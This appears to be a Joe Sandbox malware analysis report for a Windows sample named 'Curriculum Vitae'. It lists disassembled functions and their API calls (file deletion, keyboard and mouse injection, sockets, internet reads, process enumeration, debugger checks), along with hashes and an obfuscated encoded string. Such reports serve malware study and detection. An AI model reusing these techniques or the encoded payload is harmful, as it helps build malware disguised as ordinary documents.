                      • _free.LIBCMT ref: 00D6BD4B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                      • String ID:
                      • API String ID: 314583886-0
                      • Opcode ID: 0aa356ab03adce4b65d27ee95348fec696f046ef3f4fc0b3e027b57b8a54dfe5
                      • Instruction ID: 915dc0a99a58f95fc69efbeab29a1365afc72149ad8ba48b589df981444c1df4
                      • Opcode Fuzzy Hash: 0aa356ab03adce4b65d27ee95348fec696f046ef3f4fc0b3e027b57b8a54dfe5
                      • Instruction Fuzzy Hash: A1C10571A04205AFDB249F798C41AAA7BB9EF41370F18419BE494DB252E7319EC5CB70
                      Function 00D9D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00D33A97,?,?,00D32E7F,?,?,?,00000000), ref: 00D33AC2
                        • Part of subcall function 00D9E199: GetFileAttributesW.KERNEL32(?,00D9CF95), ref: 00D9E19A
                      • FindFirstFileW.KERNEL32(?,?), ref: 00D9D420
                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D9D470
                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D9D481
                      • FindClose.KERNEL32(00000000), ref: 00D9D498
                      • FindClose.KERNEL32(00000000), ref: 00D9D4A1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                      • String ID: \*.*
                      • API String ID: 2649000838-1173974218
                      • Opcode ID: cc74fd6c51b5f1214ded6f79ce80f30629b40e56c39c694bf9ecf8b757b2965b
                      • Instruction ID: da6b0b9bca4bab24245dc222869001fed1f4bc0f25123255062d7c82b32fa019
                      • Opcode Fuzzy Hash: cc74fd6c51b5f1214ded6f79ce80f30629b40e56c39c694bf9ecf8b757b2965b
                      • Instruction Fuzzy Hash: 74316C710183869FC704EF64D9919AFB7A8EE91314F844A1DF4D5932A1EB30EA09CB77
                      Function 00D6E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      • Opcode ID: 1d9a9fea8f1ff997aa3f97b5edb9efbcd6332ba419b8e4a4e3d54be58f40ae1e
                      • Instruction ID: b532e09ca3cc902006310e6402ac80ea3c1edf4bdbf912c6a5839a62b6ecc648
                      • Opcode Fuzzy Hash: 1d9a9fea8f1ff997aa3f97b5edb9efbcd6332ba419b8e4a4e3d54be58f40ae1e
                      • Instruction Fuzzy Hash: 00C24B75E086288FDB25CF28DD407EAB7B5EB44305F1841EAD84EE7241E774AE858F60
                      Function 00DA648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                      Download Yara Rule
                      APIs
                      • _wcslen.LIBCMT ref: 00DA64DC
                      • CoInitialize.OLE32(00000000), ref: 00DA6639
                      • CoCreateInstance.OLE32(00DCFCF8,00000000,00000001,00DCFB68,?), ref: 00DA6650
                      • CoUninitialize.OLE32 ref: 00DA68D4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: b4fb9b681d2eb9455c3797a0ae1faa2e8ab438e8ac57029a35cd0472be3c912c
                      • Instruction ID: bd363a45a7cc93e0b302af5fbfd763d9056888780adfca15a8558a9b2042be68
                      • Opcode Fuzzy Hash: b4fb9b681d2eb9455c3797a0ae1faa2e8ab438e8ac57029a35cd0472be3c912c
                      • Instruction Fuzzy Hash: 36D13871508201AFC314EF24C891E6BB7E9FF95704F04896DF5958B291EB70E909CBB2
                      Function 00DB22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                      Download Yara Rule
                      APIs
                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00DB22E8
                        • Part of subcall function 00DAE4EC: GetWindowRect.USER32(?,?), ref: 00DAE504
                      • GetDesktopWindow.USER32 ref: 00DB2312
                      • GetWindowRect.USER32(00000000), ref: 00DB2319
                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00DB2355
                      • GetCursorPos.USER32(?), ref: 00DB2381
                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00DB23DF
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                      • String ID:
                      • API String ID: 2387181109-0
                      • Opcode ID: ad91798d11a86ba705abeb70a0bf10e27bee73abdd99b63ab8247b05749c214d
                      • Instruction ID: 0c9881742557d3d4c5b5096f99b3c5a78c6c0e1c8bc600f56b2e7bd90a3217d8
                      • Opcode Fuzzy Hash: ad91798d11a86ba705abeb70a0bf10e27bee73abdd99b63ab8247b05749c214d
                      • Instruction Fuzzy Hash: 28319072504316ABDB20DF54C849EABB7E9FB84314F04091DF58AD7291D734E909CBA2
                      Function 00DA9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00DA9B78
                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00DA9C8B
                        • Part of subcall function 00DA3874: GetInputState.USER32 ref: 00DA38CB
                        • Part of subcall function 00DA3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DA3966
                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00DA9BA8
                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00DA9C75
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                      • String ID: *.*
                      • API String ID: 1972594611-438819550
                      • Opcode ID: 162c552ca151bd154a5ad44f24d77597179532e4e6fd858d6ea4e884711ebca9
                      • Instruction ID: caf912f21b25071fb5b7fa83f21041a6fb049e6748e0088f8a917d1d7e96cdf9
                      • Opcode Fuzzy Hash: 162c552ca151bd154a5ad44f24d77597179532e4e6fd858d6ea4e884711ebca9
                      • Instruction Fuzzy Hash: 0041607194460A9FCF14DFA4DD99AEEBBB8EF06310F248156E909A3191EB309E44CF70
                      Function 00D38060 Relevance: 8.7, Strings: 6, Instructions: 1151COMMON
                      Download Yara Rule
                      Strings
                      • VUUU, xrefs: 00D3843C
                      • E31Y30E36U33Q39Y35L35K66W34V37V64V32E66A38S62W34A35S66P63U38X62Q34N64Q30D63F33H62U34W38I30B63I37V32O32X32O38P62H35K35N66Y63C38L62R34E32B30X63D38E62R34H64V66G63U30F33D34P31X31H30U33M39R34K35H30Y63H37B33N31Y31Y38W62N35R35H66S63N38C62N34C35U30V63X32L62D34D32M30Q6, xrefs: 00D3839B, 00D383A6
                      • VUUU, xrefs: 00D383E8
                      • VUUU, xrefs: 00D383FA
                      • VUUU, xrefs: 00D75DF0
                      • ERCP, xrefs: 00D3813C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: E31Y30E36U33Q39Y35L35K66W34V37V64V32E66A38S62W34A35S66P63U38X62Q34N64Q30D63F33H62U34W38I30B63I37V32O32X32O38P62H35K35N66Y63C38L62R34E32B30X63D38E62R34H64V66G63U30F33D34P31X31H30U33M39R34K35H30Y63H37B33N31Y31Y38W62N35R35H66S63N38C62N34C35U30V63X32L62D34D32M30Q6$ERCP$VUUU$VUUU$VUUU$VUUU
                      • API String ID: 0-1572202391
                      • Opcode ID: 3d635225499cba704fb1ec24224a9689d0741a215733bbfe0dbf83c8643b3967
                      • Instruction ID: 4b321d6eec1241ceb075adf7a3a4c8188db6cbb41187a19271a88311df776496
                      • Opcode Fuzzy Hash: 3d635225499cba704fb1ec24224a9689d0741a215733bbfe0dbf83c8643b3967
                      • Instruction Fuzzy Hash: 2FA27071E0071ACBDF24CF58C8417AEB7B1BF54314F2881A9E859A7285EB70DD81DBA1
                      Function 00D4997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00D49A4E
                      • GetSysColor.USER32(0000000F), ref: 00D49B23
                      • SetBkColor.GDI32(?,00000000), ref: 00D49B36
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Color$LongProcWindow
                      • String ID:
                      • API String ID: 3131106179-0
                      • Opcode ID: de4df8461da69468eef54eaa73706807ba7e37fe3d2836e9546f86aba0387a4e
                      • Instruction ID: 987fbc810d7e0ff0014906c2d1aa780e647a35e9455c130272328355489dd0e8
                      • Opcode Fuzzy Hash: de4df8461da69468eef54eaa73706807ba7e37fe3d2836e9546f86aba0387a4e
                      • Instruction Fuzzy Hash: 3EA13B70208544BFE728BA3E8CBAE7BB69DDB82350F284209F142DA695CA25DD41D375
                      Function 00DB1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00DB304E: inet_addr.WSOCK32(?), ref: 00DB307A
                        • Part of subcall function 00DB304E: _wcslen.LIBCMT ref: 00DB309B
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00DB185D
                      • WSAGetLastError.WSOCK32 ref: 00DB1884
                      • bind.WSOCK32(00000000,?,00000010), ref: 00DB18DB
                      • WSAGetLastError.WSOCK32 ref: 00DB18E6
                      • closesocket.WSOCK32(00000000), ref: 00DB1915
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                      • String ID:
                      • API String ID: 1601658205-0
                      • Opcode ID: eca11a0553a178250684471bfb63105394121ddf17a09609c267b84c1fd13b6b
                      • Instruction ID: 924a9c5410cd2317ccc7f2e2a2d0ca804ae0caa462b5312a4a559e1fb6b1d67c
                      • Opcode Fuzzy Hash: eca11a0553a178250684471bfb63105394121ddf17a09609c267b84c1fd13b6b
                      • Instruction Fuzzy Hash: 31519475A00210AFDB10AF24C896F6A77A5EF48718F488458FA5A9F393C671ED418BB1
                      Function 00DC1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: fa78123347a956d62da1218aff219867bb442121f9cd6590c29fe5348c468db5
                      • Instruction ID: a3e54d6d4787ad57836aa00586e97d74351dd872cc4039fbb6da8e455d04c084
                      • Opcode Fuzzy Hash: fa78123347a956d62da1218aff219867bb442121f9cd6590c29fe5348c468db5
                      • Instruction Fuzzy Hash: 1F217E357402225FD7208F1AC984F6ABBA5EF96315F19905CE84ACB352C771E842CBB0
                      Function 00DBA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                      Download Yara Rule
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00DBA6AC
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00DBA6BA
                        • Part of subcall function 00D39CB3: _wcslen.LIBCMT ref: 00D39CBD
                      • Process32NextW.KERNEL32(00000000,?), ref: 00DBA79C
                      • CloseHandle.KERNEL32(00000000), ref: 00DBA7AB
                        • Part of subcall function 00D4CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00D73303,?), ref: 00D4CE8A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                      • String ID:
                      • API String ID: 1991900642-0
                      • Opcode ID: e5a251d9d2a595096f0a7fc40e129bac0105504c668293f83acf227a0b13ec29
                      • Instruction ID: 60378e1c6806c5efe71603a3101acaa1cf9fd609829abe81f200190e60181c00
                      • Opcode Fuzzy Hash: e5a251d9d2a595096f0a7fc40e129bac0105504c668293f83acf227a0b13ec29
                      • Instruction Fuzzy Hash: 87514C71508301AFD710EF25C886A6BBBE8FF89754F44891DF58A97251EB70D904CBB2
                      Function 00D9AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00D9AAAC
                      • SetKeyboardState.USER32(00000080), ref: 00D9AAC8
                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00D9AB36
                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00D9AB88
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: 221ade03fe557fb7b961886baaa3b0291afeff9cc65fbf0bfe4390e42e0eb23a
                      • Instruction ID: c7b6e56aeb09b55dc26ef015d44dd18ddc52d6e313622a9a20bf69587df069ce
                      • Opcode Fuzzy Hash: 221ade03fe557fb7b961886baaa3b0291afeff9cc65fbf0bfe4390e42e0eb23a
                      • Instruction Fuzzy Hash: E4312832A40218AFFF348B6C8C05BFA7BA6AB45318F08421AF1C5961D0D7748981C7F2
                      Function 00DACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00DACE89
                      • GetLastError.KERNEL32(?,00000000), ref: 00DACEEA
                      • SetEvent.KERNEL32(?,?,00000000), ref: 00DACEFE
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorEventFileInternetLastRead
                      • String ID:
                      • API String ID: 234945975-0
                      • Opcode ID: 7ce3a8538058acb933aa3b2f57df62d34ece50420a1c5457ef59b68c9bd18710
                      • Instruction ID: 7976f0c6fbfe2fb83b72d049b4c375c413f3079c4a002915198fdab59b1b9767
                      • Opcode Fuzzy Hash: 7ce3a8538058acb933aa3b2f57df62d34ece50420a1c5457ef59b68c9bd18710
                      • Instruction Fuzzy Hash: 51218C71510306AFEB20DF65C948BA6B7F8EF51364F14542AEA46D2151EB70EE08CBB4
                      Function 00D98298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                      Download Yara Rule
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00D982AA
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: lstrlen
                      • String ID: ($|
                      • API String ID: 1659193697-1631851259
                      • Opcode ID: f21acdded3a5c436021c22089ac4352bf437ea8f651097bf0b556956aa697269
                      • Instruction ID: ca9679e03419b9e76af35ef84a34b7f4f4f17e3152b7f1de9b30a1d2623ae797
                      • Opcode Fuzzy Hash: f21acdded3a5c436021c22089ac4352bf437ea8f651097bf0b556956aa697269
                      • Instruction Fuzzy Hash: FF323475A007059FCB28CF59C481A6AB7F0FF48B10B15C56EE49ADB3A1EB70E941CB64
                      Function 00DA5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                      Download Yara Rule
                      APIs
                      • FindFirstFileW.KERNEL32(?,?), ref: 00DA5CC1
                      • FindNextFileW.KERNEL32(00000000,?), ref: 00DA5D17
                      • FindClose.KERNEL32(?), ref: 00DA5D5F
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstNext
                      • String ID:
                      • API String ID: 3541575487-0
                      • Opcode ID: eafac9b4e264f8b795ce26e3b2b269c054fc234f69a0e839fe6a751721d0e22c
                      • Instruction ID: 2dceed95da14009436b15cf1d5af249c5e1d823792508add32f8faf18cf70340
                      • Opcode Fuzzy Hash: eafac9b4e264f8b795ce26e3b2b269c054fc234f69a0e839fe6a751721d0e22c
                      • Instruction Fuzzy Hash: 92518A75604A029FCB14CF28D494E96B7E4FF4A324F14855DE99A8B3A1CB30ED45CFA1
                      Function 00D62622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                      Download Yara Rule
                      APIs
                      • IsDebuggerPresent.KERNEL32 ref: 00D6271A
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D62724
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00D62731
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      • Opcode ID: cdf75f9771d09c484db87d1a6bf48dbb0c113768406a222dcf978891af901214
                      • Instruction ID: 9c24daa3bc80032c06a30c2651d4a03a21af93f54993cf99f0909a5bf7b01d84
                      • Opcode Fuzzy Hash: cdf75f9771d09c484db87d1a6bf48dbb0c113768406a222dcf978891af901214
                      • Instruction Fuzzy Hash: CD31C47491131DABCB21DF64DC88B98BBB8EF08310F5041EAE80CA6260E7309F858F64
                      Function 00DA51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 00DA51DA
                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DA5238
